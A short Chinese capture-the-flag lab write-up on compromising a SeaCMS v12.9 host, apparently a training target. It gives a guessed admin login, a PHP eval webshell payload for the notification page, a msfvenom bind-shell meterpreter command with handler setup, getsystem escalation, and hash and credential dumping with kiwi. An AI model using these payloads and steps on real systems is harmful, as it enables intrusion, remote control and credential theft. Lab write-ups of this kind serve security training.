考点:seacms rce ,msfvemon木马,getsystem权限提升,hashdump/load kiwi+creds_all
seacms
首先得知是seacms,但不知道什么版本
seacms版本
访问/data/admin/ver.txt目录,得到seacms版本v12.9
直接网上搜索版本历史漏洞
参考:https://blog.csdn.net/holyxp/article/details/140734295
直接尝试找后台路径
/cslab/
接着猜出账号密码 cslab:cslab
seacms rce
在会员消息通知界面可以插入木马命令执行
参考上面博客,在第一行插入一下语句,点击保存即可
1";@eval($_POST[cmd]);;//
系统为windows
蚁剑
注意蚁剑木马连接路径为
http://10.0.0.68/data/admin/notify.php
别用以下路径连接,连不上,但是可以命令执行
http://10.0.0.68/cslab/admin_notify.php
flag01
flag01在C盘根目录下
msf正向连接
之所以要正向连接,本人是windows系统,要用虚拟机,如果是mac就不用正向连接了
先用命令生成一个正向连接木马
msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4444 -f exe > shell.exe
用蚁剑上传到目标,运行
再开启正向连接
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.0.0.68
set lport 4444
run
提权
直接用getsystem提权
flag02
直接hashdump,得到ntlm cad8ef0c410c9709cea512052756ce5a
或者用load kiwi命令载入Mimikatz
最后用creds_all获取全部信息
注意flag格式哦!